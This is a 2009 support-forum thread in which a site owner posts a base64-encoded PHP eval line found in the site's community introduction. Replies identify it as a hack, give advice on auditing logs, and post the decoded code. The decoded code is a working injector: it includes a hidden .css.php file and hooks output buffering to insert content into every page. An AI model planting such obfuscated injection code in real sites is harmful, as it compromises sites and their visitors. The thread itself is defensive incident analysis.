|
|
Joined: Jun 2006
Posts: 197
enthusiast
|
enthusiast
Joined: Jun 2006
Posts: 197 |
I have this lines on my "Community Introduction Body" on version 7.3.1 Is that 'normal' or someone else put it there? Thank you -------------
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9pbWlnY29tL3B1YmxpY19odG1sL2VudmlhTWFpbC9hZG1pbi9GQ0tlZGl0b3IvZWRpdG9yL2ZpbGVtYW5hZ2VyL2Jyb3dzZXIvZGVmYXVsdC9pbWFnZXMvaWNvbnMvMzIvc3R5bGUuY3NzLnBocCcpKXtpbmNsdWRlX29uY2UoJy9ob21lL2ltaWdjb20vcHVibGljX2h0bWwvZW52aWFNYWlsL2FkbWluL0ZDS2VkaXRvci9lZGl0b3IvZmlsZW1hbmFnZXIvYnJvd3Nlci9kZWZhdWx0L2ltYWdlcy9pY29ucy8zMi9zdHlsZS5jc3MucGhwJyk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmIWZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7aWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ZnVuY3Rpb24gZ3pkZWNvZGUoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCl7JFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2Qj1vcmQoc3Vic3RyKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsMywxKSk7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MT0xMDskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxPTA7aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY0KXskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxPXVucGFjaygndicsc3Vic3RyKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsMTAsMikpOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMVsxXTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKz0yKyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImOCl7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MT1zdHJwb3MoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCxjaHIoMCksJFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSkrMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiYxNil7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MT1zdHJwb3MoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCxjaHIoMCksJFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSkrMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiYyKXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKz0yO30kUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPWd6aW5mbGF0ZShzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSk7aWYoJFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mz09PUZBTFNFKXskUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPSRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4Njg7fXJldHVybiAkUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzO319ZnVuY3Rpb24gZGdvYmgoJFJEQTNFNjE0MTRFNTBBRUU5NjgxMzJGMDNEMjY1RTBDRil7SGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7JFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MD1nemRlY29kZSgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKTtpZihwcmVnX21hdGNoKCcvXDxib2R5L3NpJywkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKSl7cmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPGJvZHlbXlw+XSpcPikvc2knLCckMScuZ21sKCksJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCk7fWVsc2V7cmV0dXJuIGdtbCgpLiRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTA7fX1vYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>
----
|
|
|
|
Joined: Jun 2006
Posts: 9,242 Likes: 1
Former Developer
|
Former Developer
Joined: Jun 2006
Posts: 9,242 Likes: 1 |
I'd say that's related to your other issue. It looks to me like you've got a hacker issue. Seems they put it into your community intro, and also into your header template.
|
|
|
|
Joined: Jun 2006
Posts: 9,242 Likes: 1
Former Developer
|
Former Developer
Joined: Jun 2006
Posts: 9,242 Likes: 1 |
I'd go through the normal cleanup and audit process at this point. You'd want to check all of your logs for any abnormal activity to try and track down how they are editing those files.
A good place to start is by grabbing the time that one of the hacked files was actually edited, and then scanning your webserver logs for that same time. You should be able to track down if it's a web-based exploit with that method.
If you don't see any matches there, then you can do the same thing with your FTP and domain CP logs.
Last edited by Rick; 09/15/2009 1:39 PM.
|
|
|
|
Joined: Jun 2006
Posts: 197
enthusiast
|
enthusiast
Joined: Jun 2006
Posts: 197 |
Thank you Rick. I start doing that now.
|
|
|
|
Joined: Jun 2006
Posts: 16,301 Likes: 116
|
Joined: Jun 2006
Posts: 16,301 Likes: 116 |
Just FYI, that decoded (and cleaned) is:
if(function_exists('ob_start') && !isset($GLOBALS['sh_no'])) {
$GLOBALS['sh_no']=1;
if(file_exists('/home/imigcom/public_html/enviaMail/admin/FCKeditor/editor/filemanager/browser/default/images/icons/32/style.css.php')) {
include_once('/home/imigcom/public_html/enviaMail/admin/FCKeditor/editor/filemanager/browser/default/images/icons/32/style.css.php');
if(function_exists('gml') && !function_exists('dgobh')) {
if(!function_exists('gzdecode')) {
function gzdecode($R20FD65E9C7406034FADC682F06732868) {
$R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20FD65E9C7406034FADC682F06732868,3,1));
$R60169CD1C47B7A7A85AB44F884635E41=10;
$R0D54236DA20594EC13FC81B209733931=0;
if($R6B6E98CDE8B33087A33E4D3A497BD86B&4) {
$R0D54236DA20594EC13FC81B209733931=unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));
$R0D54236DA20594EC13FC81B209733931=$R0D54236DA20594EC13FC81B209733931[1];
$R60169CD1C47B7A7A85AB44F884635E41+=2+$R0D54236DA20594EC13FC81B209733931;
}
if($R6B6E98CDE8B33087A33E4D3A497BD86B&8) {
$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;
}
if($R6B6E98CDE8B33087A33E4D3A497BD86B&16) {
$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;
}
if($R6B6E98CDE8B33087A33E4D3A497BD86B&2) {
$R60169CD1C47B7A7A85AB44F884635E41+=2;
}
$RC4A5B5E310ED4C323E04D72AFAE39F53=gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));
if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE) {
$RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868;
}
return $RC4A5B5E310ED4C323E04D72AFAE39F53;
}
}
function dgobh($RDA3E61414E50AEE968132F03D265E0CF) {
Header('Content-Encoding: none');$R3E33E017CD76B9B7E6C7364FB91E2E90=gzdecode($RDA3E61414E50AEE968132F03D265E0CF);
if(preg_match('/\<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)) {
return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);
} else {
return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;
}
}
ob_start('dgobh');
}
}
}
So you may need to go in and do some cleanup on your site since it looks like they made a few new files... I'd like to note that the majority of that code relies on the gzdecode function, which isn't added until PHP6... I have a hard enough time trying to find a host that supports PHP5 lol... A quick google search (trying to figure out what the global var does) came up with a lot of similar hack posts on various forums ( search)
|
|
|
|
Bots
by Outdoorking - 04/13/2024 5:08 PM
|
|
|
0 members (),
850
guests, and
177
robots. |
Key:
Admin,
Global Mod,
Mod
|
|
|
|
|